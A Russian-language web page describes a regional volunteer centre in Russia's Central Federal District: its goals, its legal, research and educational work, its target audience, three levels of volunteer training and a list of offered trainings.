О Волонтерском центре ЦФО

Цель деятельности -

создание системы подготовки организаторов и участников волонтёрского движения ЦФО.

Задачиonas2

• nРазработка и внедрение инновационных проектов развития молодежного добровольчества;
  • nПроведение научных исследований в сфере молодежного добровольчества;
  • nПодготовка профессиональных менеджеров в сфере добровольчества;
  • nРазработка организационно-правовых основ развития волонтерства в регионах ЦФО

• Организационно-правовое

- Для успешного развития добровольческих практик в России необходима соответствующая нормативно-правовая база, создающая определенные социальные гарантии волонтерам. Это позволит регулировать механизм взаимодействия органов государственной власти, местного самоуправления с общественными организациями.
Ò- Разработка системы добровольческих стандартов, этических кодексов и механизмов саморегулирования добровольческих организаций.

- В связи с этим, важным инструментом менеджмента волонтерской деятельности должна стать Личная книжка добровольца.
Ò- Принятие нормативных документов, четко определяющих регламентацию использования этого документа в профессиональной карьере молодых добровольцев.
  • Научно-исследовательское

Решение задач институционализации добровольчества нуждается в проведении  объективного  анализа реального состояния дел  в регионах, изучения особенностей волонтерских программ, осуществляемых в различных регионах России.
  • Учебно-методическое

Целевая аудитория:
- руководители и специалисты органов по делам молодежи субъектов Федерации ЦФО;
- руководители и специалисты муниципальных органов по делам молодежи ЦФО;
Ò- руководители  образовательных учреждений разного уровня  (школа-ссуз-вуз);
- руководители молодежных общественных объединений.

Подготовка добровольцев

Включает 3 уровня: Onas1b

1.Личностный – определение индивидуальных особенностей и раскрытие потенциала участников движения;
2.Коммуникативный – освоение техник межличностного взаимодействия, работы в команде, развитие навыков публичного выступления;
3.Проектный – обучение проектной деятельности и разработка социально-значимых проектов волонтёрского движения.
Предлагаемые в рамках программы тренинги:

• nЭффективное командное взаимодействие
  • nИнтерактивные технологии в профилактике употребления психоактивных веществ
  • nСоциальное проектирование от «А» до «Я», толерантность
  • nРазвитие ресурса добровольца, психологическая безопасность
  • nМетодический инструментарий в работе добровольца
  • nЯ - доброволец: возможности и ресурсы
  • nТренинг публичного выступления